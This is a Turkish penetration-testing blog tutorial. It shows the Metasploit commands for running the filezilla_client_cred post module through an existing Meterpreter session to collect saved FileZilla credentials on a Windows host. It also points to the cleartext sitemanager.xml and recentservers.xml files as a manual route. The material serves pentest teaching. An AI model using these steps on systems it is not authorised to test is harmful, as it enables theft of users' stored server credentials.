Meterpreter Bağlantısı Elde Edilmiş Olan Windows Bilgisayarda MSF filezilla_client_cred Post Modülü ile Filezilla Uygulamasındaki Erişim Bilgilerinin Elde Edilmesi

Yazarı:
Ertuğrul BAŞARANOĞLU
-
0
191
views
Sızma testleri sırasında Meterpreter ile bağlantı kurulabilmiş olan bir bilgisayarda kritik bilgi elde edilmeye çalışılır. Bu yazıda Meterpreter erişimi elde edilmiş bir Windows istemcinin Filezilla uygulamasında kayıtlı olan erişim bilgileri MSF filezilla_client_cred post modülü ile elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

W7 adlı bir bilgisayarda SYSTEM hakları ile Meterpreter bağlantısının elde edildiği görülmektedir. MSF filezilla_client_cred post modülü ile Filezilla uygulamasının içerisinde kayıtlı olan erişim bilgilerinin elde edilmesi için modül seçilir ve seçenekleri incelenir.

sessions
search filezilla type:post
use post/multi/gather/filezilla_client_cred
show options

acquiring-sensitive-logon-informations-on-filezilla-client-by-using-msf-filezilla-client-cred-post-module-01

Modüle oturum ID değeri verilerek modül çalışıtırılır ve Filezilla uygulamasında kayıtlı olan kimlik bilgileri ele geçirilir.

set SESSION 1
show options
run

acquiring-sensitive-logon-informations-on-filezilla-client-by-using-msf-filezilla-client-cred-post-module-02

İpucu: Her bir kullanıcının “C:\Users\<KullaniciAdi>\Appdata\Roaming\Filezilla” dizini altındaki “sitemanager.xml” (ve “recentservers.xml”) dosyaları içerisinde erişim bilgileri açık halde bulunur. Bu dosyalar herhangi bir metin editörü ile açılarak da Filezilla uygulamasındaki erişim bilgileri elde edilebilir.

acquiring-sensitive-logon-informations-on-filezilla-client-by-using-msf-filezilla-client-cred-post-module-03

 

İlişkili Yazılar:
Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Benzer YazılarYAZARIN DİĞER İÇERİKLERİ

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.